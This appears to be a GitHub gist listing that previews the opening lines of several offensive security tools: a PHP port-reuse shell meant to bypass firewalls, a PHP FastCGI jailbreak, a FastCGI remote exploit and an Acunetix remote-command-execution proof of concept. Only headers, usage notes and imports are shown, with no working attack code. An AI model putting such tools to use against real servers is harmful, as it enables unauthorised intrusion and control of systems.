This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// | |
// port_reuse.php | |
// | |
// Created by wofeiwo <wofeiwo@80sec.com> on 2011-08-27. | |
// Copyright 2011 80sec. All rights reserved. | |
// Reuse Apache 80 port to spawn a interactive shell. Bypass the firewall. | |
// Note: Only available on PHP >= 5.3.6 with mod_php on apache. | |
// Usage: 1. Put the script on htdocs. | |
// 2. Get interactive shell: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* ivan(a.t)mysqlab.net */ | |
package main | |
import ( | |
"syscall" | |
"os" | |
"log" | |
) | |
func daemon(nochdir, noclose int) int { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# coding: utf-8 | |
# Author: wofeiwo@80sec.com | |
# Last modified: 2017-7-18 | |
# Note: Just for research purpose | |
import sys | |
import socket | |
import argparse | |
import requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# pylint: disable=W0622 | |
# Copyright (c) 2006 Allan Saddi <allan@saddi.com> | |
# Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info> | |
# All rights reserved. | |
# | |
# Redistribution and use in source and binary forms, with or without | |
# modification, are permitted provided that the following conditions | |
# are met: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* PHP 5.3.3+ FASTCGI jailbreak | |
* | |
* @author wofeiwo <wofeiwo#80sec.com> | |
* @date 2013-01-23 | |
* @version 1.0 | |
* @reference https://bugs.php.net/bug.php?id=64103 | |
* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese) | |
* @note disable php security settings, but can't overwrite disable_function/disable_classes. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// PHP FactCGI remote exploit | |
// Date: 2012-09-15 | |
// Author: wofeiwo@80sec.com | |
// Note: Just for research purpose | |
package main | |
import ( | |
"./fcgiclient" | |
"fmt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
def payload_command (command_in): | |
html_escape_table = { | |
"&": "&", | |
'"': """, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
""" | |
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa | |
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is | |
a LPE (Local Privilege Escalation). | |
All credits for this exploit goes to Daniele Linguaglossa | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Copyright 2012 Junqing Tan <ivan@mysqlab.net> and The Go Authors | |
// Use of this source code is governed by a BSD-style | |
// Part of source code is from Go fcgi package | |
// Fix bug: Can't recive more than 1 record untill FCGI_END_REQUEST 2012-09-15 | |
// By: wofeiwo | |
package fcgiclient | |
import ( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"io" | |
"os" | |
"bufio" | |
"bytes" | |
"fmt" | |
"strings" | |
) |
NewerOlder